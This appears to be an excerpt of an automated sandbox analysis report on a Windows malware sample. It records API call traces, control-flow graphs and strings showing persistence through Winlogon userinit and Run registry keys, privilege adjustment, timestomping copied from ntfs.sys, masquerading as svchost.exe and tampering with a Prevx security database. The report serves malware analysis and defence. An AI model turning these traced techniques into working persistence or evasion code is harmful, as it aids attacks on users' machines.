                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • EntryPoint.UAVINOSIQH(00000000), ref: 00402C76
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryEntryExistsExitFindFreeHeaderImageMoveNamePathPointQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 207 4000f1-4001e3 call 4001ca 212 4001e5-400258 207->212 213 400259 207->213 214 40025a-401011 212->214 213->214 218 401017-40101a 214->218 219 40113c-401141 214->219 218->219 221 401020-401022 218->221 221->219 222 401028-401044 CreateFileA 221->222 223 401139 222->223 224 40104a-401051 call 401e00 222->224 223->219 227 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 224->227 228 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 224->228 227->228 231 40106a-401089 GetSecurityDescriptorSacl 227->231 229 401105 228->229 230 4010f5-401103 SetEndOfFile 228->230 232 401108-401111 229->232 230->229 230->232 233 4010a0-4010a4 LocalFree 231->233 234 40108b-40109a SetNamedSecurityInfoA 231->234 235 401113-401120 GetHandleInformation 232->235 236 40112f-401136 232->236 233->228 234->233 235->236 237 401122-401126 235->237 237->236 238 401128-401129 CloseHandle 237->238 238->236
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 239 401000-401011 240 401017-40101a 239->240 241 40113c-401141 239->241 240->241 242 401020-401022 240->242 242->241 243 401028-401044 CreateFileA 242->243 244 401139 243->244 245 40104a-401051 call 401e00 243->245 244->241 248 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 245->248 249 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 245->249 248->249 252 40106a-401089 GetSecurityDescriptorSacl 248->252 250 401105 249->250 251 4010f5-401103 SetEndOfFile 249->251 253 401108-401111 250->253 251->250 251->253 254 4010a0-4010a4 LocalFree 252->254 255 40108b-40109a SetNamedSecurityInfoA 252->255 256 401113-401120 GetHandleInformation 253->256 257 40112f-401136 253->257 254->249 255->254 256->257 258 401122-401126 256->258 258->257 259 401128-401129 CloseHandle 258->259 259->257
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 260 402930-40296f RegCreateKeyExA 261 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 260->261 262 4029fd-402a1e RegCreateKeyExA 260->262 265 4029e0-4029e5 261->265 263 402a20-402a22 262->263 264 402a44-402a4a 262->264 266 402a25-402a2a 263->266 267 402a4c-402a57 RegFlushKey RegCloseKey 264->267 268 402a5d-402a60 264->268 265->265 269 4029e7-4029fb 265->269 266->266 270 402a2c-402a3d 266->270 267->268 271 402a3e RegSetValueExA 269->271 270->271 271->264
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                              • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                              • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • userinit, xrefs: 00402A38
                                                                                                                                                                                                              • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                              • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                              • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 3547530944-2324515132
                                                                                                                                                                                                              • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 346 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 347 401533-401543 346->347 348 40158f-401597 346->348 349 401545-40154e GetHandleInformation 347->349 350 40155d-401567 347->350 349->350 351 401550-401554 349->351 352 401581-40158c 350->352 353 401569-401572 GetHandleInformation 350->353 351->350 354 401556-401557 CloseHandle 351->354 353->352 355 401574-401578 353->355 354->350 355->352 356 40157a-40157b CloseHandle 355->356 356->352
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 357 401be0-401c0c CreateFileA 358 401c12-401c2e GetFileTime 357->358 359 401ca5-401caa 357->359 360 401c30-401c3d GetHandleInformation 358->360 361 401c4c-401c69 CreateFileA 358->361 360->361 362 401c3f-401c43 360->362 361->359 363 401c6b-401c87 SetFileTime 361->363 362->361 364 401c45-401c46 CloseHandle 362->364 363->359 365 401c89-401c96 GetHandleInformation 363->365 364->361 365->359 366 401c98-401c9c 365->366 366->359 367 401c9e-401c9f CloseHandle 366->367 367->359
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
